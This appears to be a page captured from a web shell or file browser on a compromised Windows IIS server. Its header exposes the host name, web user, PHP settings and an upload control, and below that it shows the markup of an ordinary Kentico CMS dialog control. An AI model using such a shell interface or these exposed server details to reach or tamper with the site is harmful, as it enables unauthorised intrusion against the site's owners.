HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/RMourik/bassol.nl/CMS/CMSWebParts/Wireframe/Components/Dialog.ascx
<%@ Control Language="C#" AutoEventWireup="true" Inherits="CMSWebParts_Wireframe_Components_Dialog" CodeFile="~/CMSWebParts/Wireframe/Components/Dialog.ascx.cs" %>
<asp:Panel runat="server" id="pnlDialog" CssClass="WireframeBox">
    <cms:EditableWebPartProperty runat="server" id="ltlTitle" CssClass="WireframeBoxHeader" PropertyName="Title" Type="TextBox" />
    <cms:EditableWebPartProperty runat="server" id="ltlText" CssClass="WireframeBoxContent" PropertyName="Text" Type="TextArea" />
    <cms:EditableWebPartList runat="server" id="ltlButtons" RenderAsTag="ul" CssClass="WireframeButtons" PropertyName="Buttons" Type="TextArea" />
</asp:Panel>
<cms:WebPartResizer runat="server" id="resElem" RenderEnvelope="true" Visible="false" />